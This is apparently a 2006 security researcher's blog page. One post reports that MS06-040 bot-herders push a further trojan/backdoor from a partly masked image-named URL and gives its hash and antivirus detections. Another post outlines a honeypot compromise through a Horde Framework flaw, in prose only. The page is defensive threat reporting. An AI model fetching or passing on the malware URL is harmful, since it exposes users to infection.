honeyblog

MS06-040 Update

Tuesday, August 15. 2006

Yesterday I blogged about the recent MS06-040 vulnerability and the malware related to it. As noted by Tom Fischer, the bot-herders also install additional software on the infected machines. They issue a download for http://media.pixpond.com/l9rXXX.jpg (MD5 9bc2f9e15a4802fe5be55a0510f2f0e3 at time of this writing), which is classified by different AV-engines as



AntiVir:

---------



Signature Update:  	 2006-08-13 15:40:06

Product Version:  	 2.1.7-31

Signature Version:  	 6.35.1.85

Result:  	 Trojan/Dldr.Bary.FL.2



Signature Update: 	2006-08-14 09:40:05

Product Version: 	2.1.7-31

Signature Version: 	6.35.1.87

Result: 	Trojan/Proxy.FV



BitDefender:

--------------



Signature Update: 	2006-08-14 00:40:06

Product Version: 	7.0.2492

Signature Version: 	444432

Result: 	Backdoor.Proxy.Piky.B



ClamAV:

---------



Signature Update: 	2006-08-13 21:40:05

Product Version: 	0.88.2

Signature Version: 	1655

Result: 	Trojan.Proxy.Ranky-29

There is also an analysis of this binary from our sandbox (and in XML).

Update: LURHQ has also an update on Mocbot Spam Analysis.

Posted by Thorsten Holz at 17:49 | Comments (0) | Trackbacks (0)

Honeypot Compromises I

Tuesday, August 15. 2006

Some time ago I blogged about several compromises at our honeypots deployed in Germany. Now it is time for an update and a closer look at what happened during these incidents. Today we will take a closer look at the compromise of a Suse 9.1 honeypot with a vulnerable Horde Framework. The attacked installed several scripts on the honeypot and also tried to set up a phishing web site.

Motivation:
On May 5th 2006 our Suse 9.1 based Honeypot was attacked and successfully compromised by exploiting a vulnerable web application, the Horde Application Framework. The vulnerability could be exploited by a remote attacker to execute arbitrary commands with the privileges of the running Apache webserver process. This flaw is due to an input validation error in the help viewer of the application. The vulnerability was first discovered in March 2006 and affects all Horde Application Framework versions prior to 3.1.1.

The full analysis was written by Jan Göbel during his thesis work.

Posted by Thorsten Holz in honeynets at 11:25 | Comments (0) | Trackbacks (0)

	August '06
Mon	Tue	Wed	Thu	Fri	Sat	Sun
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31

MS06-040 Update

Honeypot Compromises I

About

Calendar

Quicksearch

Archives

Categories

Syndicate This Blog

Creative Commons